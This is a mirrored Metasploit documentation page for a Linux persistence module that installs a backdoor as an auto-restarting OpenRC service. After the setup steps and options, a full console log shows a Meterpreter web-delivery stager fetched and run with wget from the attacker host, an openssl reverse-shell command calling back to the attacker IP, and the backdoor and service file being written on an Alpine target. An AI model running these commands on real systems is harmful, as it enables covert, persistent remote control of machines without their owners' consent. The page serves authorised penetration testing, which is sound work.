Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/linux/persistence/init_openrc.md
23654 views

Vulnerable Application

This module will create a service on the box via OpenRC, and mark it for auto-restart. We need enough access to write service files and potentially restart services.

Verified against alpine 3.21.2

Verification Steps

  1. Exploit a box and get a root session

  2. use exploit/linux/persistence/init_openrc

  3. set SESSION <session>

  4. set PAYLOAD <payload>

  5. set LHOST <lhost>

  6. exploit

Options

WritableDir

Remote writable directory to store the payload. Avoid using /tmp as it will be deleted upon reboot.

SERVICE

The name of the service to create. If not chosen, a random one is created.

PAYLOAD_NAME

The name of the file to write with our shell if a non-cmd payload is used. If not chosen, a random one is created.

Scenarios

Alpine Linux 3.21.2

Of note, the default install of Alpine doesn't have curl, or bash. The OpenSSL payload was confirmed working though

Initial access vector via web delivery

[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
lhost => 111.111.1.111
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set srvport 8181
srvport => 8181
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4545
lport => 4545
resource (/root/.msf4/msfconsole.rc)> set URIPATH l
URIPATH => l
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 111.111.1.111:4545 
[*] Using URL: http://111.111.1.111:8181/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO xK7yCqmS --no-check-certificate http://111.111.1.111:8181/l; chmod +x xK7yCqmS; ./xK7yCqmS& disown
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > 
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 222.222.2.222
[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.222:33954) at 2025-02-09 09:31:16 -0500
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/root) > getuid
Server username: root
(Meterpreter 1)(/root) > sysinfo
Computer     : alpine3.21.2
OS           :  (Linux 6.12.12-0-virt)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
(Meterpreter 1)(/root) > background
[*] Backgrounding session 1...

Persistence

[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/init_openrc 
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:1 Agents:1) exploit(linux/persistence/init_openrc) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(linux/persistence/init_openrc) > set payload payload/cmd/unix/reverse_openssl
payload => cmd/unix/reverse_openssl
[msf](Jobs:1 Agents:1) exploit(linux/persistence/init_openrc) > exploit
[+] sh -c '(sleep 4296|openssl s_client -quiet -connect 111.111.1.111:4444|while : ; do sh && break; done 2>&1|openssl s_client -quiet -connect 111.111.1.111:4444 >/dev/null 2>&1 &)'
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(linux/persistence/init_openrc) > 
[*] Started reverse double SSL handler on 111.111.1.111:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. /tmp/ is writable and openrc based
[*] Writing backdoor to /tmp//rljkrbglMY
[*] Writing service: /etc/init.d/GpdAgZVBGWq
[*] Writing '/etc/init.d/GpdAgZVBGWq' (141 bytes) ...
[*] Enabling service
[+] Starting service
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/alpine3.21.2_20250209.3159/alpine3.21.2_20250209.3159.rc
[*] Command: echo duVbKHsRwQ5D05J7;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "duVbKHsRwQ5D05J7\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (111.111.1.111:4444 -> 222.222.2.222:43560) at 2025-02-09 09:32:07 -0500